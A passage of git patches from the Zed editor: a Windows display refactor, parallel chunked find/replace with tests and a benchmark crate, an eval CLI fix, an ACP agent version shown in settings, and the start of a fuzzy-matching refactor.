= generate_uuid(&info.szDevice); - let scale_factor = get_scale_factor_for_monitor(handle)?; - let physical_size = size( - (monitor_size.right - monitor_size.left).into(), - (monitor_size.bottom - monitor_size.top).into(), - ); - - Ok(WindowsDisplay { - handle, - display_id, - scale_factor, - bounds: Bounds { - origin: logical_point( - monitor_size.left as f32, - monitor_size.top as f32, - scale_factor, - ), - size: physical_size.to_pixels(scale_factor), - }, - visible_bounds: Bounds { - origin: logical_point(work_area.left as f32, work_area.top as f32, scale_factor), - size: size( - (work_area.right - work_area.left) as f32 / scale_factor, - (work_area.bottom - work_area.top) as f32 / scale_factor, - ) - .map(gpui::px), - }, - physical_bounds: Bounds { - origin: point(monitor_size.left.into(), monitor_size.top.into()), - size: physical_size, - }, - uuid, - }) + pub(crate) fn display_id_for_monitor(monitor: HMONITOR) -> DisplayId { + DisplayId::new(monitor.0 as u64) } pub fn primary_monitor() -> Option { @@ -169,7 +89,7 @@ impl WindowsDisplay { ); return None; } - WindowsDisplay::new_with_handle(monitor).log_err() + WindowsDisplay::new(Self::display_id_for_monitor(monitor)) } /// Check if the center point of given bounds is inside this monitor @@ -183,7 +103,7 @@ impl WindowsDisplay { if monitor.is_invalid() { false } else { - let Ok(display) = WindowsDisplay::new_with_handle(monitor) else { + let Some(display) = WindowsDisplay::new(Self::display_id_for_monitor(monitor)) else { return false; }; display.uuid == self.uuid @@ -193,11 +113,11 @@ impl WindowsDisplay { pub fn displays() -> Vec> { available_monitors() .into_iter() - .enumerate() - .filter_map(|(id, handle)| { - Some(Rc::new( - WindowsDisplay::new_with_handle_and_id(handle, DisplayId::new(id as _)).ok()?, - ) as Rc) + .filter_map(|handle| { + Some( + Rc::new(WindowsDisplay::new(Self::display_id_for_monitor(handle))?) + as Rc, + ) }) .collect() } diff --git a/crates/gpui_windows/src/events.rs b/crates/gpui_windows/src/events.rs index 370582e83b5a5f..a4c47789191f9c 100644 --- a/crates/gpui_windows/src/events.rs +++ b/crates/gpui_windows/src/events.rs @@ -143,9 +143,9 @@ impl WindowsWindowInner { // monitor is invalid, we do nothing. if !monitor.is_invalid() && self.state.display.get().handle != monitor { // we will get the same monitor if we only have one - self.state - .display - .set(WindowsDisplay::new_with_handle(monitor).log_err()?); + self.state.display.set(WindowsDisplay::new( + WindowsDisplay::display_id_for_monitor(monitor), + )?); } } if let Some(mut callback) = self.state.callbacks.moved.take() { @@ -853,7 +853,7 @@ impl WindowsWindowInner { log::error!("No monitor detected!"); return None; } - let new_display = WindowsDisplay::new_with_handle(new_monitor).log_err()?; + let new_display = WindowsDisplay::new(WindowsDisplay::display_id_for_monitor(new_monitor))?; self.state.display.set(new_display); Some(0) } diff --git a/crates/gpui_windows/src/window.rs b/crates/gpui_windows/src/window.rs index 2fd7c3c6461dd5..130d3dd7214b2c 100644 --- a/crates/gpui_windows/src/window.rs +++ b/crates/gpui_windows/src/window.rs @@ -465,11 +465,12 @@ impl WindowsWindow { let hinstance = get_module_handle(); let display = if let Some(display_id) = params.display_id { - // if we obtain a display_id, then this ID must be valid. - WindowsDisplay::new(display_id).unwrap() + WindowsDisplay::new(display_id) } else { - WindowsDisplay::primary_monitor().unwrap() - }; + None + } + .or_else(WindowsDisplay::primary_monitor) + .context("failed to find any monitor")?; let appearance = system_appearance().unwrap_or_default(); let mut context = WindowCreateContext { inner: None, From 4e5d9a7f980b6a661c0714a053e7d74502f94224 Mon Sep 17 00:00:00 2001 From: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> Date: Wed, 6 May 2026 11:28:05 +0200 Subject: [PATCH 221/231] editor: Improve find_matches and replace_all perf (#51941) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Helps with https://github.com/zed-industries/zed/issues/38927 - **editor: Add a benchmark for find/replace** - **text: batch fragment insertions before turning them into a SumTree** ## Context ## How to Review ## Self-Review Checklist - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Improved performance of "Replace All" in buffer search --------- Co-authored-by: Smit Barmase --- Cargo.lock | 18 ++ Cargo.toml | 1 + crates/editor/src/items.rs | 248 +++++++++++++++++++++--- crates/editor_benchmarks/Cargo.toml | 22 +++ crates/editor_benchmarks/LICENSE-GPL | 1 + crates/editor_benchmarks/src/main.rs | 180 +++++++++++++++++ crates/multi_buffer/src/multi_buffer.rs | 26 ++- crates/text/src/text.rs | 49 ++++- 8 files changed, 506 insertions(+), 39 deletions(-) create mode 100644 crates/editor_benchmarks/Cargo.toml create mode 120000 crates/editor_benchmarks/LICENSE-GPL create mode 100644 crates/editor_benchmarks/src/main.rs diff --git a/Cargo.lock b/Cargo.lock index 2a28d8922505ea..f35cb8bbfb2f23 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -5549,6 +5549,24 @@ dependencies = [ "ztracing", ] +[[package]] +name = "editor_benchmarks" +version = "0.1.0" +dependencies = [ + "anyhow", + "editor", + "gpui", + "gpui_platform", + "language", + "multi_buffer", + "project", + "release_channel", + "semver", + "settings", + "theme", + "workspace", +] + [[package]] name = "either" version = "1.15.0" diff --git a/Cargo.toml b/Cargo.toml index e613ed2e99afad..683592a35b9aba 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -61,6 +61,7 @@ members = [ "crates/edit_prediction_types", "crates/edit_prediction_ui", "crates/editor", + "crates/editor_benchmarks", "crates/encoding_selector", "crates/env_var", "crates/etw_tracing", diff --git a/crates/editor/src/items.rs b/crates/editor/src/items.rs index 125f09c96614e1..c352ec9d03f17e 100644 --- a/crates/editor/src/items.rs +++ b/crates/editor/src/items.rs @@ -11,7 +11,7 @@ use anyhow::{Context as _, Result, anyhow}; use collections::{HashMap, HashSet}; use file_icons::FileIcons; use fs::MTime; -use futures::future::try_join_all; +use futures::{channel::oneshot, future::try_join_all}; use git::status::GitSummary; use gpui::{ AnyElement, App, AsyncWindowContext, Context, Entity, EntityId, EventEmitter, Font, @@ -22,22 +22,24 @@ use language::{ SelectionGoal, proto::serialize_anchor as serialize_text_anchor, }; use lsp::DiagnosticSeverity; -use multi_buffer::{MultiBufferOffset, PathKey}; +use multi_buffer::{BufferOffset, MultiBufferOffset, PathKey}; use project::{ File, Project, ProjectItem as _, ProjectPath, lsp_store::FormatTrigger, project_settings::ProjectSettings, search::SearchQuery, }; +use rope::TextSummary; use rpc::proto::{self, update_view}; use settings::Settings; use std::{ any::{Any, TypeId}, borrow::Cow, cmp::{self, Ordering}, + num::NonZeroU32, ops::Range, path::{Path, PathBuf}, sync::Arc, }; -use text::{BufferId, BufferSnapshot, Selection}; +use text::{BufferId, BufferSnapshot, OffsetRangeExt, Selection}; use ui::{IconDecorationKind, prelude::*}; use util::{ResultExt, TryFutureExt, paths::PathExt, rel_path::RelPath}; use workspace::item::{Dedup, ItemSettings, SerializableItem, TabContentParams}; @@ -1871,6 +1873,7 @@ impl SearchableItem for Editor { ranges.iter().cloned().collect::>() }); + let executor = cx.background_executor().clone(); cx.background_spawn(async move { let mut ranges = Vec::new(); @@ -1879,38 +1882,70 @@ impl SearchableItem for Editor { } else { search_within_ranges }; - + let num_cpus = executor.num_cpus(); for range in search_within_ranges { for (search_buffer, search_range, deleted_hunk_anchor) in buffer.range_to_buffer_ranges_with_deleted_hunks(range) { - ranges.extend( - query - .search( - search_buffer, - Some(search_range.start.0..search_range.end.0), - ) - .await - .into_iter() - .filter_map(|match_range| { - if let Some(deleted_hunk_anchor) = deleted_hunk_anchor { - let start = search_buffer - .anchor_after(search_range.start + match_range.start); - let end = search_buffer - .anchor_before(search_range.start + match_range.end); - Some( - deleted_hunk_anchor.with_diff_base_anchor(start) - ..deleted_hunk_anchor.with_diff_base_anchor(end), - ) - } else { - let start = search_buffer - .anchor_after(search_range.start + match_range.start); - let end = search_buffer - .anchor_before(search_range.start + match_range.end); - buffer.buffer_anchor_range_to_anchor_range(start..end) - } - }), - ); + let query = query.clone(); + + let mut results = Vec::new(); + executor + .scoped(|scope| { + for search_range in chunk_search_range( + search_buffer.text.clone(), + &query, + num_cpus as u32, + search_range, + ) { + let query = query.clone(); + let buffer = buffer.clone(); + + let (tx, rx) = oneshot::channel(); + results.push(rx); + scope.spawn(async move { + let chunk_result = query + .search( + search_buffer, + Some(search_range.start..search_range.end), + ) + .await + .into_iter() + .filter_map(|match_range| { + if let Some(deleted_hunk_anchor) = deleted_hunk_anchor { + let start = search_buffer.anchor_after( + search_range.start + match_range.start, + ); + let end = search_buffer.anchor_before( + search_range.start + match_range.end, + ); + Some( + deleted_hunk_anchor.with_diff_base_anchor(start) + ..deleted_hunk_anchor + .with_diff_base_anchor(end), + ) + } else { + let start = search_buffer.anchor_after( + search_range.start + match_range.start, + ); + let end = search_buffer.anchor_before( + search_range.start + match_range.end, + ); + buffer.anchor_range_in_buffer(start..end) + } + }) + .collect::>(); + _ = tx.send(chunk_result); + }); + } + }) + .await; + + for rx in results { + if let Ok(results) = rx.await { + ranges.extend(results); + } + } } } @@ -2109,6 +2144,48 @@ fn deserialize_path_key(path_key: proto::PathKey) -> Option { }) } +fn chunk_search_range( + buffer: BufferSnapshot, + query: &SearchQuery, + num_cpus: u32, + initial_range: Range, +) -> Box> + 'static> { + let range = initial_range.to_offset(&buffer); + if range.is_empty() { + return Box::new(std::iter::empty()); + } + + let summary: TextSummary = buffer.text_summary_for_range(initial_range); + let num_chunks = if !query.is_regex() && !query.as_str().contains('\n') { + NonZeroU32::new(summary.lines.row.saturating_add(1).min(num_cpus.max(1))) + } else { + NonZeroU32::new(1) + }; + + let Some(num_chunks) = num_chunks else { + return Box::new(std::iter::empty()); + }; + + let mut chunk_start = range.start; + let rope = buffer.as_rope().clone(); + let range_end = range.end; + let average_chunk_length = summary.len.div_ceil(num_chunks.get() as usize); + Box::new(std::iter::from_fn(move || { + if chunk_start >= range_end { + return None; + } + let candidate_position = chunk_start + average_chunk_length; + let adjusted = rope.ceil_char_boundary(candidate_position); + let mut as_point = rope.offset_to_point(adjusted); + as_point.row += 1; + as_point.column = 0; + let end_offset = buffer.point_to_offset(as_point).min(range_end); + let ret = chunk_start..end_offset; + chunk_start = end_offset; + Some(ret) + })) +} + #[cfg(test)] mod tests { use crate::editor_tests::init_test; @@ -2134,6 +2211,115 @@ mod tests { assert_eq!(path_for_file(&file, 0, false, cx), None); } + #[gpui::test] + fn test_chunk_search_range_multi_line(cx: &mut App) { + let text = "line one\nline two\nline three\nline four\nline five\nline six\n"; + let buffer = cx.new(|cx| Buffer::local(text, cx)); + let snapshot = buffer.read(cx).snapshot(); + + let chunks = chunk_search_range_for_test(&snapshot, "line", 4, 0..text.len()); + + assert_chunks_are_contiguous(&chunks, 0..text.len()); + assert!( + chunks.len() <= 4, + "got {} chunks, expected <= num_cpus (4)", + chunks.len() + ); + for chunk in &chunks { + let end = chunk.end; + assert!( + end == text.len() || text.as_bytes()[end - 1] == b'\n', + "chunk ending at {end} is not a line boundary", + ); + } + } + + #[gpui::test] + fn test_chunk_search_range_single_line(cx: &mut App) { + let text = "hello world hello again"; + let buffer = cx.new(|cx| Buffer::local(text, cx)); + let snapshot = buffer.read(cx).snapshot(); + + let chunks = chunk_search_range_for_test(&snapshot, "hello", 4, 0..text.len()); + assert_chunks_are_contiguous(&chunks, 0..text.len()); + } + + #[gpui::test] + fn test_chunk_search_range_empty_range(cx: &mut App) { + let buffer = cx.new(|cx| Buffer::local("hello world", cx)); + let snapshot = buffer.read(cx).snapshot(); + + let chunks = chunk_search_range_for_test(&snapshot, "hello", 4, 5..5); + assert!(chunks.is_empty()); + } + + #[gpui::test] + fn test_chunk_search_range_does_not_start_at_zero(cx: &mut App) { + let line = "abcdefghij\n"; + let text = line.repeat(20); + let buffer = cx.new(|cx| Buffer::local(text.clone(), cx)); + let snapshot = buffer.read(cx).snapshot(); + + let start = line.len() * 7; + let end = line.len() * 14; + let chunks = chunk_search_range_for_test(&snapshot, "abc", 4, start..end); + + assert_chunks_are_contiguous(&chunks, start..end); + } + + fn chunk_search_range_for_test( + snapshot: &language::BufferSnapshot, + query: &str, + num_cpus: u32, + range: Range, + ) -> Vec> { + let query = SearchQuery::text( + query, + false, + false, + false, + Default::default(), + Default::default(), + false, + None, + ) + .unwrap(); + chunk_search_range( + snapshot.text.clone(), + &query, + num_cpus, + BufferOffset(range.start)..BufferOffset(range.end), + ) + .collect() + } + + #[track_caller] + fn assert_chunks_are_contiguous(chunks: &[Range], expected: Range) { + assert!(!chunks.is_empty(), "expected at least one chunk"); + assert_eq!( + chunks.first().unwrap().start, + expected.start, + "first chunk does not start at {}", + expected.start + ); + assert_eq!( + chunks.last().unwrap().end, + expected.end, + "last chunk does not end at {}", + expected.end + ); + for chunk in chunks { + assert!(chunk.start < chunk.end, "empty chunk: {:?}", chunk); + } + for window in chunks.windows(2) { + assert_eq!( + window[0].end, window[1].start, + "gap or overlap between chunks {:?} and {:?}", + window[0], window[1], + ); + } + } + async fn deserialize_editor( item_id: ItemId, workspace_id: WorkspaceId, diff --git a/crates/editor_benchmarks/Cargo.toml b/crates/editor_benchmarks/Cargo.toml new file mode 100644 index 00000000000000..8db5d4b26aefd8 --- /dev/null +++ b/crates/editor_benchmarks/Cargo.toml @@ -0,0 +1,22 @@ +[package] +name = "editor_benchmarks" +version = "0.1.0" +publish.workspace = true +edition.workspace = true + +[dependencies] +anyhow.workspace = true +editor.workspace = true +gpui.workspace = true +gpui_platform.workspace = true +language.workspace = true +multi_buffer.workspace = true +project.workspace = true +release_channel.workspace = true +semver.workspace = true +settings.workspace = true +theme.workspace = true +workspace.workspace = true + +[lints] +workspace = true diff --git a/crates/editor_benchmarks/LICENSE-GPL b/crates/editor_benchmarks/LICENSE-GPL new file mode 120000 index 00000000000000..89e542f750cd38 --- /dev/null +++ b/crates/editor_benchmarks/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/crates/editor_benchmarks/src/main.rs b/crates/editor_benchmarks/src/main.rs new file mode 100644 index 00000000000000..81df55334014da --- /dev/null +++ b/crates/editor_benchmarks/src/main.rs @@ -0,0 +1,180 @@ +use std::sync::Arc; + +use editor::Editor; +use gpui::{AppContext as _, AsyncWindowContext, WeakEntity, WindowBounds, WindowOptions}; +use language::Buffer; +use multi_buffer::Anchor; +use project::search::SearchQuery; +use workspace::searchable::SearchableItem; + +#[derive(Debug)] +struct Args { + file: String, + query: String, + replace: Option, + regex: bool, + whole_word: bool, + case_sensitive: bool, +} + +fn parse_args() -> Args { + let mut args_iter = std::env::args().skip(1); + let mut parsed = Args { + file: String::new(), + query: String::new(), + replace: None, + regex: false, + whole_word: false, + case_sensitive: false, + }; + + let mut positional = Vec::new(); + while let Some(arg) = args_iter.next() { + match arg.as_str() { + "--regex" => parsed.regex = true, + "--whole-word" => parsed.whole_word = true, + "--case-sensitive" => parsed.case_sensitive = true, + "-r" | "--replace" => { + parsed.replace = args_iter.next(); + } + "--help" | "-h" => { + eprintln!( + "Usage: editor_benchmarks [OPTIONS] \n\n\ + Arguments:\n \ + Path to the file to search in\n \ + The search query string\n\n\ + Options:\n \ + -r, --replace Replacement text (runs replace_all)\n \ + --regex Treat query as regex\n \ + --whole-word Match whole words only\n \ + --case-sensitive Case-sensitive matching\n \ + -h, --help Print help" + ); + std::process::exit(0); + } + other => positional.push(other.to_string()), + } + } + + if positional.len() < 2 { + eprintln!("Usage: editor_benchmarks [OPTIONS] "); + std::process::exit(1); + } + parsed.file = positional.remove(0); + parsed.query = positional.remove(0); + parsed +} + +fn main() { + let args = parse_args(); + + let file_contents = std::fs::read_to_string(&args.file).expect("failed to read input file"); + let file_len = file_contents.len(); + println!("Read {} ({file_len} bytes)", args.file); + + let mut query = if args.regex { + SearchQuery::regex( + &args.query, + args.whole_word, + args.case_sensitive, + false, + false, + Default::default(), + Default::default(), + false, + None, + ) + .expect("invalid regex query") + } else { + SearchQuery::text( + &args.query, + args.whole_word, + args.case_sensitive, + false, + Default::default(), + Default::default(), + false, + None, + ) + .expect("invalid text query") + }; + + if let Some(replacement) = args.replace.as_deref() { + query = query.with_replacement(replacement.to_string()); + } + + let query = Arc::new(query); + let has_replacement = args.replace.is_some(); + + gpui_platform::headless().run(move |cx| { + release_channel::init_test( + semver::Version::new(0, 0, 0), + release_channel::ReleaseChannel::Dev, + cx, + ); + settings::init(cx); + theme::init(theme::LoadThemes::JustBase, cx); + editor::init(cx); + + let buffer = cx.new(|cx| Buffer::local(file_contents, cx)); + + let window_handle = cx + .open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(gpui::Bounds { + origin: Default::default(), + size: gpui::size(gpui::px(800.0), gpui::px(600.0)), + })), + focus: false, + show: false, + ..Default::default() + }, + |window, cx| cx.new(|cx| Editor::for_buffer(buffer, None, window, cx)), + ) + .expect("failed to open window"); + + window_handle + .update(cx, move |_, window, cx| { + cx.spawn_in( + window, + async move |weak: WeakEntity, + cx: &mut AsyncWindowContext| + -> anyhow::Result<()> { + let find_task = weak.update_in(cx, |editor, window, cx| { + editor.find_matches(query.clone(), window, cx) + })?; + + println!("Finding matches..."); + let timer = std::time::Instant::now(); + let matches: Vec> = find_task.await; + let find_elapsed = timer.elapsed(); + println!("Found {} matches in {find_elapsed:?}", matches.len()); + + if has_replacement && !matches.is_empty() { + window_handle.update(cx, |editor: &mut Editor, window, cx| { + let mut match_iter = matches.iter(); + println!("Replacing all matches..."); + let timer = std::time::Instant::now(); + editor.replace_all( + &mut match_iter, + &query, + Default::default(), + window, + cx, + ); + let replace_elapsed = timer.elapsed(); + println!( + "Replaced {} matches in {replace_elapsed:?}", + matches.len() + ); + })?; + } + + std::process::exit(0); + }, + ) + .detach(); + }) + .unwrap(); + }); +} diff --git a/crates/multi_buffer/src/multi_buffer.rs b/crates/multi_buffer/src/multi_buffer.rs index de0a43bac914a8..74eaeef53ebf1a 100644 --- a/crates/multi_buffer/src/multi_buffer.rs +++ b/crates/multi_buffer/src/multi_buffer.rs @@ -5258,6 +5258,16 @@ impl MultiBufferSnapshot { Some(Anchor::in_buffer(path_key_index, anchor)) } + /// Lifts a buffer anchor range to a multibuffer anchor range without checking against excerpt boundaries. Returns `None` if there are no excerpts for the buffer. + pub fn anchor_range_in_buffer(&self, range: Range) -> Option> { + if range.start.buffer_id != range.end.buffer_id { + return None; + } + + let path_key_index = self.path_key_index_for_buffer(range.start.buffer_id)?; + Some(Anchor::range_in_buffer(path_key_index, range)) + } + /// Creates a multibuffer anchor for the given buffer anchor, if it is contained in any excerpt. pub fn anchor_in_excerpt(&self, text_anchor: text::Anchor) -> Option { let excerpts = { @@ -5295,6 +5305,19 @@ impl MultiBufferSnapshot { &self, text_anchor: Range, ) -> Option> { + if self.is_singleton() { + let excerpt = self.excerpts.first()?; + let buffer_snapshot = excerpt.buffer_snapshot(self); + if excerpt.range.contains(&text_anchor.start, &buffer_snapshot) + && excerpt.range.contains(&text_anchor.end, &buffer_snapshot) + { + return Some(Anchor::range_in_buffer(excerpt.path_key_index, text_anchor)); + } + } + + // for each search match + + let mut buffer_snapshot = None; for excerpt in { let this = &self; let buffer_id = text_anchor.start.buffer_id; @@ -5316,7 +5339,8 @@ impl MultiBufferSnapshot { .into_iter() .flatten() } { - let buffer_snapshot = excerpt.buffer_snapshot(self); + let buffer_snapshot = + buffer_snapshot.get_or_insert_with(|| excerpt.buffer_snapshot(self)); if excerpt.range.contains(&text_anchor.start, &buffer_snapshot) && excerpt.range.contains(&text_anchor.end, &buffer_snapshot) { diff --git a/crates/text/src/text.rs b/crates/text/src/text.rs index 026f1272790740..4b947234054f10 100644 --- a/crates/text/src/text.rs +++ b/crates/text/src/text.rs @@ -38,7 +38,7 @@ use std::{ }; pub use subscription::*; pub use sum_tree::Bias; -use sum_tree::{Dimensions, FilterCursor, SumTree, TreeMap, TreeSet}; +use sum_tree::{Dimensions, FilterCursor, SumTree, Summary, TreeMap, TreeSet}; use undo_map::UndoMap; use util::debug_panic; @@ -912,7 +912,8 @@ impl Buffer { let mut new_ropes = RopeBuilder::new(self.visible_text.cursor(0), self.deleted_text.cursor(0)); let mut old_fragments = self.fragments.cursor::(&None); - let mut new_fragments = old_fragments.slice(&edits.peek().unwrap().0.start, Bias::Right); + let mut new_fragments = + FragmentBuilder::new(old_fragments.slice(&edits.peek().unwrap().0.start, Bias::Right)); new_ropes.append(new_fragments.summary().text); let mut fragment_start = old_fragments.start().visible; @@ -1044,7 +1045,7 @@ impl Buffer { let (visible_text, deleted_text) = new_ropes.finish(); drop(old_fragments); - self.snapshot.fragments = new_fragments; + self.snapshot.fragments = new_fragments.to_sum_tree(&None); self.snapshot.insertions.edit(new_insertions, ()); self.snapshot.visible_text = visible_text; self.snapshot.deleted_text = deleted_text; @@ -1127,8 +1128,9 @@ impl Buffer { let mut old_fragments = self .fragments .cursor::>(&cx); - let mut new_fragments = - old_fragments.slice(&VersionedFullOffset::Offset(ranges[0].start), Bias::Left); + let mut new_fragments = FragmentBuilder::new( + old_fragments.slice(&VersionedFullOffset::Offset(ranges[0].start), Bias::Left), + ); new_ropes.append(new_fragments.summary().text); let mut fragment_start = old_fragments.start().0.full_offset(); @@ -1291,7 +1293,7 @@ impl Buffer { let (visible_text, deleted_text) = new_ropes.finish(); drop(old_fragments); - self.snapshot.fragments = new_fragments; + self.snapshot.fragments = new_fragments.to_sum_tree(&None); self.snapshot.visible_text = visible_text; self.snapshot.deleted_text = deleted_text; self.snapshot.insertions.edit(new_insertions, ()); @@ -1303,7 +1305,7 @@ impl Buffer { new_text: &str, timestamp: clock::Lamport, insertion_offset: &mut u32, - new_fragments: &mut SumTree, + new_fragments: &mut FragmentBuilder, new_insertions: &mut Vec>, insertion_slices: &mut Vec, new_ropes: &mut RopeBuilder, @@ -2836,6 +2838,39 @@ impl BufferSnapshot { } } +struct FragmentBuilder { + fragments: Vec, + summary: FragmentSummary, +} + +impl FragmentBuilder { + fn new(init: SumTree) -> Self { + Self { + summary: init.summary().clone(), + fragments: init.iter().cloned().collect(), + } + } + fn append(&mut self, items: SumTree, cx: &Option) { + if !items.is_empty() { + self.summary.add_summary(items.summary(), cx); + self.fragments.extend(items.iter().cloned()); + } + } + fn push(&mut self, fragment: Fragment, cx: &Option) { + self.append(SumTree::from_item(fragment, cx), cx); + } + fn to_sum_tree(self, cx: &Option) -> SumTree { + if self.fragments.len() > 1024 { + SumTree::from_par_iter(self.fragments, cx) + } else { + SumTree::from_iter(self.fragments, cx) + } + } + fn summary(&self) -> &FragmentSummary { + &self.summary + } +} + struct RopeBuilder<'a> { old_visible_cursor: rope::Cursor<'a>, old_deleted_cursor: rope::Cursor<'a>, From cd876f10730329145aaba40531d74e175646a715 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Wed, 6 May 2026 11:35:43 +0200 Subject: [PATCH 222/231] eval_cli: Set global filesystem in eval CLI init (#55862) Some dependency started requiring this, so fixing some runtime errors. Release Notes: - N/A --- crates/eval_cli/src/headless.rs | 1 + 1 file changed, 1 insertion(+) diff --git a/crates/eval_cli/src/headless.rs b/crates/eval_cli/src/headless.rs index 0ddd99e8f8abd9..a5b86f8eec8478 100644 --- a/crates/eval_cli/src/headless.rs +++ b/crates/eval_cli/src/headless.rs @@ -70,6 +70,7 @@ pub fn init(cx: &mut App) -> Arc { git_binary_path, cx.background_executor().clone(), )); + ::set_global(fs.clone(), cx); let mut languages = LanguageRegistry::new(cx.background_executor().clone()); languages.set_language_server_download_dir(paths::languages_dir().clone()); From bcebf01fd27e81f3293de6942ae51acb871fd6cb Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Wed, 6 May 2026 11:36:43 +0200 Subject: [PATCH 223/231] acp: Show running agent version in configuration (#55824) Store the ACP agent version from agent_info and expose it through AgentConnection so the configuration UI can display it for connected agents. Helpful when debugging to know which version is currently running. image Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - acp: Show running agent version in the External Agent settings --- crates/acp_thread/src/connection.rs | 4 ++++ crates/agent_servers/src/acp.rs | 20 ++++++++++++++++--- crates/agent_ui/src/agent_configuration.rs | 12 +++++++---- crates/agent_ui/src/agent_connection_store.rs | 7 +++++++ 4 files changed, 36 insertions(+), 7 deletions(-) diff --git a/crates/acp_thread/src/connection.rs b/crates/acp_thread/src/connection.rs index bbb967530e3a5f..41ca3e4c6a6bd1 100644 --- a/crates/acp_thread/src/connection.rs +++ b/crates/acp_thread/src/connection.rs @@ -49,6 +49,10 @@ pub trait AgentConnection { fn telemetry_id(&self) -> SharedString; + fn agent_version(&self) -> Option { + None + } + fn new_session( self: Rc, project: Entity, diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index 93efddb03d81db..cc467eb8cd0762 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -413,6 +413,7 @@ fn enqueue_notification( pub struct AcpConnection { id: AgentId, telemetry_id: SharedString, + agent_version: Option, connection: ConnectionTo, sessions: Rc>>, pending_sessions: Rc>>, @@ -900,12 +901,15 @@ impl AcpConnection { } }); - let telemetry_id = response - .agent_info + let agent_info = response.agent_info; + let telemetry_id = agent_info + .as_ref() // Use the one the agent provides if we have one - .map(|info| info.name.into()) + .map(|info| SharedString::from(info.name.clone())) // Otherwise, just use the name .unwrap_or_else(|| agent_id.0.clone()); + let agent_version = agent_info + .and_then(|info| (!info.version.is_empty()).then(|| SharedString::from(info.version))); let session_list = if response .agent_capabilities @@ -945,6 +949,7 @@ impl AcpConnection { agent_server_store, connection, telemetry_id, + agent_version, sessions, pending_sessions: Rc::new(RefCell::new(HashMap::default())), agent_capabilities: response.agent_capabilities, @@ -978,6 +983,7 @@ impl AcpConnection { Self { id: AgentId::new("test"), telemetry_id: "test".into(), + agent_version: None, connection, sessions, pending_sessions: Rc::new(RefCell::new(HashMap::default())), @@ -1319,6 +1325,10 @@ impl AgentConnection for AcpConnection { self.telemetry_id.clone() } + fn agent_version(&self) -> Option { + self.agent_version.clone() + } + fn new_session( self: Rc, project: Entity, @@ -1984,6 +1994,10 @@ pub mod test_support { self.inner.telemetry_id() } + fn agent_version(&self) -> Option { + self.inner.agent_version() + } + fn new_session( self: Rc, project: Entity, diff --git a/crates/agent_ui/src/agent_configuration.rs b/crates/agent_ui/src/agent_configuration.rs index 39b1302555bebf..67d21211026b0d 100644 --- a/crates/agent_ui/src/agent_configuration.rs +++ b/crates/agent_ui/src/agent_configuration.rs @@ -1135,10 +1135,13 @@ impl AgentConfiguration { id: agent_server_name.clone(), }; - let connection_status = self - .agent_connection_store - .read(cx) - .connection_status(&agent, cx); + let (connection_status, running_version) = { + let connection_store = self.agent_connection_store.read(cx); + ( + connection_store.connection_status(&agent, cx), + connection_store.agent_version(&agent, cx), + ) + }; let restart_button = matches!( connection_status, @@ -1252,6 +1255,7 @@ impl AgentConfiguration { AiSettingItem::new(id, display_name, status, source_kind) .icon(icon) + .when_some(running_version, |this, version| this.detail_label(version)) .when_some(restart_button, |this, button| this.action(button)) .when_some(uninstall_button, |this, button| this.action(button)) } diff --git a/crates/agent_ui/src/agent_connection_store.rs b/crates/agent_ui/src/agent_connection_store.rs index a01f19dd0f222b..fb4ae4b1c4b1b0 100644 --- a/crates/agent_ui/src/agent_connection_store.rs +++ b/crates/agent_ui/src/agent_connection_store.rs @@ -97,6 +97,13 @@ impl AgentConnectionStore { .unwrap_or(AgentConnectionStatus::Disconnected) } + pub fn agent_version(&self, key: &Agent, cx: &App) -> Option { + match self.entries.get(key)?.read(cx) { + AgentConnectionEntry::Connected(state) => state.connection.agent_version(), + AgentConnectionEntry::Connecting { .. } | AgentConnectionEntry::Error { .. } => None, + } + } + pub fn active_acp_connections(&self, cx: &App) -> Vec { self.entries .values() From 227837aa68b87ad1a5df4dd37982d7e058d384d9 Mon Sep 17 00:00:00 2001 From: Finn Eitreim <48069764+feitreim@users.noreply.github.com> Date: Wed, 6 May 2026 03:56:20 -0700 Subject: [PATCH 224/231] fuzzy_nucleo: Refactor multi-atom code to use nucleo::Pattern (#55264) refactor of the fuzzy_nucleo string and path matching code, instead of handling the multiple atoms ourselves we can just use `nucleo::Pattern` and abstract that all away. this replaces the for loop in the path/string_match_helper functions. all functionality is exactly the same. basically the same / within some tiny margin of the original. this could enable the use of `nucleo::Pattern::parse` in the future if that was wanted, which allows some extra syntax to activate different matching modes. [more info from deepwiki](https://deepwiki.com/search/how-do-the-different-atom-matc_37e510de-af27-44a1-a52f-3fc367462e6e?mode=fast). I'm pretty sure that enabling that is as simple as switching a `Pattern::new(...)` call with `Pattern::parse(...)`. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/fuzzy_nucleo/src/fuzzy_nucleo.rs | 80 +++++++++ crates/fuzzy_nucleo/src/paths.rs | 210 ++++++++---------------- crates/fuzzy_nucleo/src/strings.rs | 126 +++----------- 3 files changed, 172 insertions(+), 244 deletions(-) diff --git a/crates/fuzzy_nucleo/src/fuzzy_nucleo.rs b/crates/fuzzy_nucleo/src/fuzzy_nucleo.rs index 